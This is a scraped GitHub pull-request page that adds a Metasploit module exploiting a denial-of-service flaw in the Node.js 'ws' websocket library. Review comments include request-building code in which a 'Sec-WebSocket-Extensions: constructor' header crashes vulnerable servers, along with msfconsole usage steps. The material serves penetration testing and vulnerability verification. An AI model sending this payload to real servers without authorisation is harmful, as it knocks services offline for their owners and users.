-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Adding ws DoS module #9283
Adding ws DoS module #9283
Conversation
This module verifies if ws is vulnerable to DoS by sending a request to the server containing a specific header value. ws is a npm module which handles websockets.
Adding module documentation for ws_dos.
modules/auxiliary/dos/http/ws_dos.rb
Outdated
req = [ | ||
"GET #{path} HTTP/1.1", | ||
"Connection: Upgrade", | ||
"Sec-WebSocket-Key: test", |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Can key
be randomised ? Rex::Text.rand_text_alpha(rand(10) + 5)
1. Start the vulnerable server using the sample server code below `node server.js` | ||
2. Start `msfconsole` | ||
3. `use auxiliary/dos/http/ws_dos` | ||
4. `set RHOST XXX.XXX.XXX.XXX` |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Suggest: set RHOST <IP>
## Vulnerable Application | ||
|
||
[ws < 1.1.5 || (2.0.0 , 3.3.1)] | ||
(https://nodesecurity.io/advisories/550) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
"Sec-WebSocket-Extensions: constructor", #Adding "constructor" as the value for this header causes the DoS | ||
"Upgrade: websocket", | ||
"\r\n" | ||
].join("\r\n"); |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Ideally the module would use send_request_cgi
from the Msf::Exploit::Remote::Http
mixin, rather than using raw TCP.
Unfortunately it seems the HTTP mixin doesn't support websockets and there are no WebSocket libraries :(
Something like this would make the module much cleaner.
res = send_request_cgi({
'uri' => normalize_uri(target_uri.to_s),
'headers' => {
'Connection' => 'Upgrade',
'Upgrade' => 'websocket',
'Sec-WebSocket-Key' => Rex::Text.rand_text_alpha(rand(10) + 5).to_s,
'Sec-WebSocket-Version' => '8',
'Sec-WebSocket-Extensions' => 'constructor' # Adding "constructor" as the value for this header causes the DoS
}
}, 15)
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
We tried to use send_request_cgi previously, however, we were unable to get the exploit to work because of the lack of WebSocket support.
1. Updated documentation 2. Made the Sec-WebSocket-Key header a random value
I just wanted to check with you on the status of the review of this pull request. Thank you. |
1. Start the vulnerable server using the sample server code below `node server.js` | ||
2. Start `msfconsole` | ||
3. `use auxiliary/dos/http/ws_dos` | ||
4. `set RHOST XXX.XXX.XXX.XXX` | ||
4. `set RHOST <IP> |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Missing `
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I added the missing `
Added a missing backtick
Die, die!
|
Release NotesThis adds a Denial of Service exploit for the 'ws' websocket library in Node.js. |
This module verifies if ws is vulnerable
to DoS by sending a request to the server
containing a specific header value.
ws is a npm module which handles websockets.
Tell us what this change does. If you're fixing a bug, please mention
the github issue number.
Verification
List the steps needed to make sure this thing works
msfconsole
use auxiliary/dos/http/ws_dos
npm i ws@1.1.4
run
in msfThis is an example server we tested against
for this vulnerability.